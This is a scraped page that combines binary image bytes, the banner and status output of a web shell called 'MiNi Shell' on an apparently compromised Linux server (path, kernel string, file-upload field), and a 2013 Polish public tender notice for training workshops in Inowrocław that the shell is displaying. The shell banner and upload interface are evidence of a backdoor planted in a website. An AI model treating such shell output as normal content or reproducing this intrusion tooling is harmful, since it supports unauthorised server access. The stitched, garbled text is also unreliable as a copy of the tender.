JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130726/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130726/298218-N-2013.html

<p class="kh_header"><b>Inowrocław: Wykonanie usług szkoleniowych polegających na zorganizowaniu i przeprowadzeniu szkoleń dla osób uczestniczących w projekcie Aktywność się opłaca</b><br>
<b>Numer ogłoszenia: 298218 - 2013; data zamieszczenia: 26.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Św. Ducha 90, 88-100 Inowrocław, woj. kujawsko-pomorskie, tel. 52 3571031, faks 52 3552450.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie usług szkoleniowych polegających na zorganizowaniu i przeprowadzeniu szkoleń dla osób uczestniczących w projekcie Aktywność się opłaca.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie usług szkoleniowych polegających na zorganizowaniu i przeprowadzeniu szkoleń dla osób uczestniczących w projekcie Aktywność się opłaca realizowanym w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej, współfinansowanym ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, w tym:
Część 1 - Warsztaty pokonać stres pozytywnymi emocjami dla 79 osób
25 godzin lekcyjnych dla każdej z grup (łącznie 100 godzin lekcyjnych). Zajęcia prowadzone będą  w 4 grupach, tj.:
a) jednej grupie 23-osobowej (kobiety bezrobotne i nieaktywne zawodowo, bezradne w sprawach opiekuńczo - wychowawczych i prowadzenia gospodarstwa domowego), w planowanym terminie od 16.09.2013r. do 20.09.2013r.,
b) trzech grupach, w tym: grupa A - 20 osób, grupa B - 18 osób, grupa C - 18 osób (osoby niepełnosprawne z lekkim i umiarkowanym stopniem niepełnosprawności), w planowanym terminie: grupa A: od 26.08.2013r. do 30.08.2013 r., grupa B i C: od 19.08.2013r. do 23.08.2013r.
Część 2 - Warsztaty domowej przedsiębiorczości dla 23 osób
25 godzin lekcyjnych dla jednej grupy 23 osobowej. Są to kobiety bezrobotne i nieaktywne zawodowo, bezradne w sprawach opiekuńczo - wychowawczych i prowadzenia gospodarstwa domowego. Planowany termin zajęć od 19.08.2013r. do 23.08.2013r.
Część 3 - Indywidualne konsultacje pedagogiczne dla 65 osób, w tym:
a) 4 godziny lekcyjne na osobę dla 56 osób niepełnosprawnych w stopniu lekkim i umiarkowanym, w planowanym terminie, tj.:
- grupa A (20 osób) od 2.09.2013r. do 6.09.2013 r. (pierwsze spotkanie - 2 godziny lekcyjne na osobę) i od 16.09.2013r. do 19.09.2013 r. (drugie spotkanie - 2 godziny lekcyjne na osobę),
- grupa B (18 osób) od 9.09.2013r. do 13.09.2013 r. (pierwsze spotkanie - 2 godziny lekcyjne na osobę) i od 23.09.2013r. do 27.09.2013 r. (drugie spotkanie - 2 godziny lekcyjne na osobę),
- grupa C (18 osób) - terminy konsultacji takie same jak w grupie B;
b) 6 godzin lekcyjnych na osobę dla 9 osób (kobiety bezrobotne i nieaktywne zawodowo, bezradne w sprawach opiekuńczo - wychowawczych i prowadzenia gospodarstwa domowego) , w planowanym terminie, tj.:
- od 26.08.2013r. do 27.08.2013r.(pierwsze spotkanie - 2 godziny lekcyjne),
- od 9.09.2013r. do 10.09.2013r. (drugie spotkanie - 2 godziny lekcyjne),
- od 23.09.2013r. do 24.09.2013 r. (trzecie spotkanie - 2 godziny lekcyjne).
Część  4 - Warsztaty planowania kariery zawodowej dla 25 osób.
20 godzin lekcyjnych dla grupy 25 osobowej. Młodzież w wieku 15-25 lat (12 dziewcząt i 13 chłopców) z rodzin zagrożonych demoralizacją i wykluczeniem społecznym z powodu dziedziczenia biedy i uzależnienia od systemu pomocy społecznej, w planowanym terminie: 12,13,14 i 23.08.2013r.
Część   5 - Warsztaty przygotowania do życia w rodzinie dla 25 osób.
25 godzin lekcyjnych dla grupy 25 osobowej. Młodzież w wieku 15-25 lat (12 dziewcząt i 13 chłopców) z rodzin zagrożonych demoralizacją i wykluczeniem społecznym z powodu dziedziczenia biedy i uzależnienia od systemu pomocy społecznej, w planowanym terminie: 26.08.2013r.-30.08.2013r. 
Część 6 - Warsztaty promocji zdrowia wraz z indywidualną konsultacją dietetyka dla 56 osób niepełnosprawnych, w tym:
20 godzin lekcyjnych dla każdej z trzech grup (łącznie 60 godzin lekcyjnych warsztatów) + 56 godzin zegarowych indywidualnych konsultacji z dietetykiem dla każdej osoby.
Planowany termin zajęć:
a) grupa A: 20 osób, w terminie od 9.09.2013r. do 12.09.2013 r. (zajęcia grupowe) i w terminie od 16.09.2013r. do 19.09.2013 r. (indywidualne konsultacje);
b) grupa B: 18 osób, w terminie od 2.09.2013r. do 5.09.2013r. (zajęcia grupowe) i w terminie od 6.09.2013r. do 13.09.2013r. (indywidualne konsultacje);
c) grupa C: 18 osób, w terminie od 2.09.2013r. do 5.09.2013r. (zajęcia grupowe) i w terminie od 6.09.2013r. do 13.09.2013r. (indywidualne konsultacje). 
Wśród uczestników - osób niepełnosprawnych nie ma osób poruszających się na wózkach inwalidzkich, niewidomych i głuchoniemych. Są osoby poruszające się o kulach, w związku z czym należy zapewnić dostęp do sal dydaktycznych znajdujących się na niskich kondygnacjach (parter) lub umożliwić dotarcie na wyższe kondygnacje windą (dot. części zamówienia nr 1, 3, 6).
2. Do Wykonawcy należy zapewnienie pomieszczeń, w których będą odbywać się szkolenia wyposażonych w pomoce dydaktyczne, zgodnie z wymaganiami Zamawiającego, opisanymi w załączniku nr 1 do SIWZ oraz zapewnienie materiałów piśmienniczych i poczęstunku.
Zamawiający zastrzega prawo zmiany ilości uczestników szkoleń w przypadku przerwania lub zakończenia udziału w projekcie lub z powodu innych okoliczności uniemożliwiających uczestnikom szkolenia udział w zajęciach. 
3. Szczegółowy opis przedmiotu zamówienia i wymagania Zamawiającego są zawarte w załączniku nr 1 do SIWZ.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.52.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.09.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od wykonawców wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali usługi szkoleniowe, polegające na zorganizowaniu i przeprowadzeniu szkoleń/ warsztatów/ kursów o zbliżonej tematyce do zamawianych, w tym: 
cz. 1 - co najmniej jednego o tematyce pokonać stres pozytywnymi emocjami (lub o podobnej tematyce);
cz. 2 - co najmniej jednego w zakresie warsztatów domowej przedsiębiorczości (lub o podobnej tematyce);
cz. 3 - co najmniej jednego w zakresie indywidualnych konsultacji pedagogicznych (lub o podobnej tematyce); 
cz. 4 - co najmniej jednego w zakresie warsztatów planowania kariery zawodowej (lub o podobnej tematyce);
cz. 5 - co najmniej jednego w zakresie warsztatów przygotowania do życia w rodzinie  (lub o podobnej tematyce);
cz. 6 - co najmniej jednego w zakresie warsztatów promocji zdrowia wraz z indywidualną konsultacją dietetyka  (lub o podobnej tematyce).

Spełnianie warunku nastąpi na podstawie złożonego wykazu wykonanych usług (załącznik nr 7 do SIWZ) wraz z dokumentami potwierdzającymi, że te usługi zostały wykonane należycie, na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponują lub będą dysponować do dnia zawarcia umowy  pomieszczeniami do przeprowadzenia szkoleń. 
Spełnianie warunku zostanie ocenione na podstawie złożonego oświadczenia (załącznik nr 10 do SIWZ) na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują osobami zdolnymi do wykonania zamówienia:
dla części 1 zamówienia
- co najmniej 1 osoby posiadające wykształcenie wyższe oraz przygotowanie pedagogiczne lub trenerskie, doświadczenie w prowadzeniu kursów/ warsztatów/szkoleń o podobnej tematyce, tj. pokonać stres pozytywnymi emocjami. 
dla części 2 zamówienia
- co najmniej 1 osoba posiadająca wykształcenie wyższe oraz przygotowanie pedagogiczne lub trenerskie, doświadczenie w prowadzeniu kursów/ warsztatów/szkoleń o podobnej tematyce, tj. warsztaty domowej przedsiębiorczości. 
dla części 3  zamówienia
- co najmniej 3 osoby posiadające wykształcenie wyższe oraz przygotowanie pedagogiczne lub trenerskie, doświadczenie w prowadzeniu kursów/ warsztatów/szkoleń w zakresie indywidualnych konsultacji pedagogicznych lub o podobnej tematyce. 
dla części 4 zamówienia
- co najmniej 1 osoba posiadająca wykształcenie wyższe oraz przygotowanie pedagogiczne lub trenerskie, doświadczenie w prowadzeniu kursów/ warsztatów/szkoleń o podobnej tematyce, tj. warsztaty planowania kariery zawodowej. 
dla części 5 zamówienia
- co najmniej 2 osoby, w tym 1 posiadająca wykształcenie wyższe oraz przygotowanie pedagogiczne lub trenerskie, doświadczenie w prowadzeniu kursów/ warsztatów/szkoleń o podobnej tematyce, tj. warsztaty przygotowania do życia w rodzinie oraz 1 seksuolog.  
dla części 6 zamówienia 
- co najmniej 3 osoby, w tym 1 posiadająca wykształcenie wyższe oraz przygotowanie pedagogiczne lub trenerskie, doświadczenie w prowadzeniu kursów/ warsztatów/szkoleń o podobnej tematyce, tj. warsztaty promocji zdrowia oraz 2 dietetyków.  
Spełnianie warunku zostanie ocenione na podstawie złożonego wykazu osób uczestniczących w wykonywaniu zamówienia (załącznik nr 6 do SIWZ) oraz oświadczenia, że wymienione osoby posiadają wymagane uprawnienia; na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie określa się minimalnych standardów. Spełnianie warunku zostanie ocenione na podstawie złożonego oświadczenia, na zasadzie spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1) opis programów oferowanych szkoleń z uwzględnieniem zakresu przedmiotu   zamówienia i wymagań Zamawiającego, wzór opisu -  zał. nr 11 do SIWZ,
2)  kalkulacja kosztów szkolenia, wg wzoru - zał. nr 9 do SIWZ.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>formularz ofertowy - wzór zał. nr 2 do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 50.00</li>
<li>2 - Doświadczenie zawodowe - 50.00</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w następujących przypadkach: a) zamawiający zastrzega zgodnie z art. 145 ustawy, iż w razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach; b) zmiany ilości uczestników szkoleń, w przypadku przerwania lub zakończenia przez uczestnika udziału w projekcie lub z powodu innych okoliczności uniemożliwiających uczestnikom szkolenia udział w zajęciach. W ww. przypadku pomniejsza się cenę brutto za zakładaną/szacunkową ilość osób/uczestników o koszty za osobę/y, które przerwały lub zakończyły udział w projekcie. Zamawiający zapłaci za osoby, które ukończyły szkolenia; c) zmiany terminów wykonania szkoleń, z przyczyn nieleżących po stronie Wykonawcy; d) zmiany miejsca prowadzenia zajęć szkoleń, z przyczyn niezależnych od Wykonawcy (np. wypowiedzenie umowy najmu użyczenia lokalu, powódź). Przy czym nowe pomieszczenie/a muszą znajdować się w Inowrocławiu i spełniać wszystkie wymagane przez Zamawiającego wymagania; e) zmiany harmonogramów w uzasadnionych przypadkach; f) zmiany osób przeprowadzających szkolenie w uzasadnionych wypadkach, z tym, że inne osoby nie mogą posiadać niższych kwalifikacji; g) zmiana warunków finansowania, h) zmiany podatku od towarów i usług VAT; i) zmiany programów szkoleń, w uzasadnionych przypadkach. 3. Warunkiem wprowadzenia ww. zmian będzie pisemne uzasadnienie wprowadzenia ww. zmian. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron w formie pisemnej zastrzeżonej pod rygorem nieważności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mopsinowroclaw.samorzady.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej, ul. Św. Ducha 90, 88-100 Inowrocław, pok. nr 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.08.2013 godzina 09:00, miejsce: Miejski Ośrodek Pomocy Społecznej, ul. Św. Ducha 90, 88-100 Inowrocław, pok. nr 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie współfinansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.1. Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej, pn.: Aktywność się opłaca.
Planowany termin wykonania zamówienia:
Część I - Warsztaty pokonać stres pozytywnymi emocjami
              od 19.08.2013r. do 20.09.2013r. 
Część II - Warsztaty domowej przedsiębiorczości        
               od 19.08.2013r. do 23.08.2013r. 
Część III - Indywidualne konsultacje pedagogiczne
                od 26.08.2013r. do 27.09.2013r. 
Część IV - Warsztaty planowania kariery zawodowej  
                od 12.08.2013r. do 23.08.2013r. 
Część  V - Warsztaty przygotowania do życia w rodzinie
                od 26.08.2013r. do 30.08.2013r.
Część  VI - Warsztaty promocji zdrowia wraz z indywidualną konsultacją dietetyka 
                od 2.09.2013r. do 19.09.2013r.
Faktyczny termin szkoleń zostanie ustalony z wybranym Wykonawcą.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie usług szkoleniowych polegających na zorganizowaniu i przeprowadzeniu szkoleń dla osób uczestniczących w projekcie Aktywność się opłaca - cz. I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 1 - Warsztaty pokonać stres pozytywnymi emocjami dla 79 osób.
25 godzin lekcyjnych dla każdej z grup (łącznie 100 godzin lekcyjnych). Zajęcia prowadzone będą w 4 grupach, tj.:
a) jednej grupie 23-osobowej (kobiety bezrobotne i nieaktywne zawodowo, bezradne w sprawach opiekuńczo - wychowawczych i prowadzenia gospodarstwa domowego), w planowanym terminie od 16.09.2013r. do 20.09.2013r.,
b) trzech grupach, w tym: grupa A - 20 osób, grupa B - 18 osób, grupa C - 18 osób (osoby niepełnosprawne z lekkim i umiarkowanym stopniem niepełnosprawności), w planowanym terminie: grupa A: od 26.08.2013r. do 30.08.2013 r., grupa B i C: od 19.08.2013r. do 23.08.2013r.
Szczegółowy opis przedmiotu zamówienia dla cz. I jest zawarty w załączniku nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.52.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50.00</li>
<li>2. Doświadczenie zawodowe - 50.00</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie usług szkoleniowych polegających na zorganizowaniu i przeprowadzeniu szkoleń dla osób uczestniczących w projekcie Aktywność się opłaca - cz. II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 2 - Warsztaty domowej przedsiębiorczości dla 23 osób.
25 godzin lekcyjnych dla jednej grupy 23 osobowej. Są to kobiety bezrobotne i nieaktywne zawodowo, bezradne w sprawach opiekuńczo - wychowawczych i prowadzenia gospodarstwa domowego. Planowany termin zajęć od 19.08.2013r. do 23.08.2013r.
